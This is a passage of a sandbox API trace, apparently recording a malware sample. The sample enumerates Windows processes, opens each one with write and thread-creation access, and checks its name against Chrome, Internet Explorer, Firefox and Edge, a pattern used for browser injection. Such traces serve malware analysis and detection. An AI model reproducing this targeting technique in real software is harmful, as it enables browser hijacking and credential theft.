	[0201.393] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0201.394] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x1f4c
	[0201.394] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.394] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0201.394] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.394] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.395] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.395] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0201.395] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.395] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.396] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0201.397] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x1f50
	[0201.397] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.397] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0201.397] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.397] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.398] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.398] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0201.398] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.398] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.398] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0201.399] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x1f54
	[0201.399] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.399] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0201.400] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.400] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.400] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.400] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0201.400] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.400] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.401] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0201.401] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x1f58
	[0201.402] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.402] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0201.402] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.402] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.402] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.402] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0201.403] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.403] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.403] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0201.404] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x1f5c
	[0201.404] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.404] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0201.404] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.404] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.404] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.404] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0201.404] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.405] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.405] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0201.405] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x1f60
	[0201.406] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.406] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0201.406] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.406] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.406] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.406] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0201.406] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.406] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.406] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0201.407] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x1f64
	[0201.407] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.407] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0201.408] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.408] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.408] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.408] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0201.408] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.408] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.408] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0201.409] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x1f68
	[0201.409] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.409] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0201.410] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.410] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.410] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.410] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0201.410] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.410] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.410] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0201.411] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x1f6c
	[0201.411] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.411] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0201.412] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.412] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.412] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.412] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0201.412] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.412] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.413] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0201.413] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x1f70
	[0201.413] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.414] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0201.414] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.414] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.414] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.414] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0201.414] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.414] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.415] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0201.415] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x1f74
	[0201.415] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.415] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0201.416] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.416] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.416] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.416] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0201.416] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.416] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.417] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0201.417] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x1f78
	[0201.417] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.418] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0201.418] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.418] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.418] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.418] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0201.418] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.419] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.419] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0201.419] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x1f7c
	[0201.419] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.420] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0201.420] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.420] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.420] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.420] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0201.420] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.421] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.421] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0201.421] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x1f80
	[0201.422] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.422] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0201.422] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.422] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.422] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.422] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0201.423] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.423] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.423] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0201.423] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x1f84
	[0201.424] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.424] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0201.424] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.424] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.424] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.424] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0201.424] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.425] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.425] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0201.425] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x1f88
	[0201.426] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.426] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0201.426] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.426] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.426] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.426] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0201.427] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.427] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.427] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0201.427] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x1f8c
	[0201.428] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.428] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0201.429] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.429] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.429] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.429] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0201.429] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.429] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.430] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0201.430] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x1f90
	[0201.430] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.430] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0201.431] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.431] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.431] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.431] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0201.431] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.431] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.432] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0201.432] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x1f94
	[0201.432] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.432] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0201.433] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.433] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.433] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.433] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0201.433] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.433] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.434] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0201.434] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x1f98
	[0201.435] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.435] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0201.435] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.435] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.435] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.435] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0201.435] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.435] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.436] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0201.436] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x1f9c
	[0201.436] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.436] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0201.437] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.437] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.437] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.437] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0201.437] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.437] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.437] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0201.438] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x1fa0
	[0201.438] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.438] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0201.438] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.439] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.439] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.439] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0201.439] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.439] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.439] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0201.440] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0201.440] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0201.441] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x1fa4
	[0201.441] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.441] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0201.441] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.441] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.442] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.442] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0201.443] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.443] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.443] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0201.444] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x1fa8
	[0201.444] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.444] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0201.444] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.444] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0201.445] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.445] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0201.445] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.445] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0201.445] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0201.446] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x1fac
	[0201.446] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0201.446] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
